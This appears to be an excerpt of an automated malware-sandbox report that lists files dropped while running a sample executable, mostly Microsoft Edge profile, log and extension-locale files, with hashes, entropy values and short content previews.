                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997913147686059
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:d4Cj8MCt4LnKaJ1Zri4B3wq4fTOPUka0O0D5FoUZvZAtHrkPOCjEVhFSZul:d47t45Twepa325FZxAtEHbkl
                                                                                                                                                                                                                                                                                                        MD5:124F42DBA4EA1DBFDF40879F3F6093EF
                                                                                                                                                                                                                                                                                                        SHA1:820F5D328A1F6EA7AED8413C2330C8BBE585B07F
                                                                                                                                                                                                                                                                                                        SHA-256:9F74B8DE39D0F3EB2F69CF94552D8A51BDF5D1045321C66002B32A6C86E310E6
                                                                                                                                                                                                                                                                                                        SHA-512:7C62F24BDDF272A9D4C98DEC1F62352198193F861C317507B9C837C99D83B83F50EADE583A253B04FBFD2D8B8D56B06545F2822A99B85D6919D5DC12639104D2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2950
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.615408213885943
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YuBqDPEFMsFiHC0afrCRDR8/4kHB+adrxSvBcPW+xRxOaJkX7rcGc9aHAaSymSyK:Xq8NkC1frCULB3wvWPXxnJkrrcVaSDSh
                                                                                                                                                                                                                                                                                                        MD5:17875320B02D8363B5EA89DF7BF15968
                                                                                                                                                                                                                                                                                                        SHA1:92652F601E9EBF8F707CAF6459CB8DE88F4C739A
                                                                                                                                                                                                                                                                                                        SHA-256:1E5C421B56413EF77A7B5B7448B31209C7E92F2FC4A5F257BC47BF89C7E07E07
                                                                                                                                                                                                                                                                                                        SHA-512:555D333393A830B1F14C889539080DE810AE9621263FEC8EA06E06680AAAB41348909027C5797D062DA0D45B4846639FA2C5B088D9F144189EF87151C9C0834A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"policy":{"last_statistics_update":"13379003728677825"},"profile":{"info_ca
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2950
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.615408213885943
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YuBqDPEFMsFiHC0afrCRDR8/4kHB+adrxSvBcPW+xRxOaJkX7rcGc9aHAaSymSyK:Xq8NkC1frCULB3wvWPXxnJkrrcVaSDSh
                                                                                                                                                                                                                                                                                                        MD5:17875320B02D8363B5EA89DF7BF15968
                                                                                                                                                                                                                                                                                                        SHA1:92652F601E9EBF8F707CAF6459CB8DE88F4C739A
                                                                                                                                                                                                                                                                                                        SHA-256:1E5C421B56413EF77A7B5B7448B31209C7E92F2FC4A5F257BC47BF89C7E07E07
                                                                                                                                                                                                                                                                                                        SHA-512:555D333393A830B1F14C889539080DE810AE9621263FEC8EA06E06680AAAB41348909027C5797D062DA0D45B4846639FA2C5B088D9F144189EF87151C9C0834A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"policy":{"last_statistics_update":"13379003728677825"},"profile":{"info_ca
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0400661317802743
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:2JOUjLYiVWK+ggCNlHgJZzK1d9XONY1Pg+znhXJBVEKWh8RQJul7Z7Nn8y08TcmQ:oOUjjl8cM58hZMwtZR08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:87D34C38658230A4DC164A50F6FD45C5
                                                                                                                                                                                                                                                                                                        SHA1:37AA64894B5AD790CE36B5715FFF4D2FBC620C91
                                                                                                                                                                                                                                                                                                        SHA-256:B94D5B50C31F8C649986A596C330A9880D4D3B97EDA144D143B0C2C7F1E14270
                                                                                                                                                                                                                                                                                                        SHA-512:133ACA0BFE81D76592AE6A3C786E2D1C010428473877DB5EC433509B84EB0EEE0FB98EBD781AA00716F6B665839ED8E22A9CB51CFCB0D7A7D6E582147AA76667
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.7447980503789413
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlT/KzmQf7tDdRbO/TgEQ+SYHt:o1zKzPf7XRbO/05+Sat
                                                                                                                                                                                                                                                                                                        MD5:3013395A0E096FBB856EAEC2D8CDC7BA
                                                                                                                                                                                                                                                                                                        SHA1:6997ECB8123E102139F0B02FDE2044FA343E462B
                                                                                                                                                                                                                                                                                                        SHA-256:E8AE2A9ABAB622D2354C550C908A4B5EB64AAD36E5F3CA5525C83D0C3996564C
                                                                                                                                                                                                                                                                                                        SHA-512:87295AA9D813CEE533781058AB7A65FD7163D0C118AB2663615397746E1B07A48FC721B39A5405907D121386D24C1D61A1DC91779A489D10F0DDE32091187AF5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                        MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                        SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                        SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                        SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:level=none expiry=0.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):85
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
                                                                                                                                                                                                                                                                                                        MD5:BC6142469CD7DADF107BE9AD87EA4753
                                                                                                                                                                                                                                                                                                        SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
                                                                                                                                                                                                                                                                                                        SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
                                                                                                                                                                                                                                                                                                        SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.393643543873903
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YGgw50Mue0vMi5aGc59aI0xs5BYX0f8H5pRhRUj0Wphx5SVr80Kzxv5M:YGgw50MF0vMi5aGc59aI0xs5BO0f05LL
                                                                                                                                                                                                                                                                                                        MD5:37B3D67F798643C17A2FD47F35668F29
                                                                                                                                                                                                                                                                                                        SHA1:8D4C3E1FFF4F2F9F3E47795550B173D9F34203C5
                                                                                                                                                                                                                                                                                                        SHA-256:59B58874D1A0209137B95A7A8F13944BAFC48D9D32252B2FE71715E407E0A203
                                                                                                                                                                                                                                                                                                        SHA-512:3A6CE4381C7402A3F1410BC8DCB63BC03FAD1E8777428E0CB4C9BBC393F4BDB01E335BA679198DAEC88825D0C893461A04A896FAD2A390CFF8F40440C3BCA404
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1005/105557", "correlationVector":"IhwEFhHe1RCLbT1FQv/Ae0","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/105558", "correlationVector":"57761A34EFC64D3D925ED8A5BDB16EC4","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/105558", "correlationVector":"XmF4rJWUxa+a0S8KiTzuSi","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110506", "correlationVector":"RUEKzvGjkNy28IkhpSYjUT","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110507", "correlationVector":"908AB9CF10A04EEBB546EA86CCC2D75C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/110612", "correlationVector":"cIZRk+6N+6j8nraOt6/zBX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110613", "correlationVector":"24FC3F60363640349D28C611916C70BE","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/110742", "correlationVector":"9q1Nr5/Hy+Ch3gwSLtcPX1","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110743", "correlationVector":"6476C2A6
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
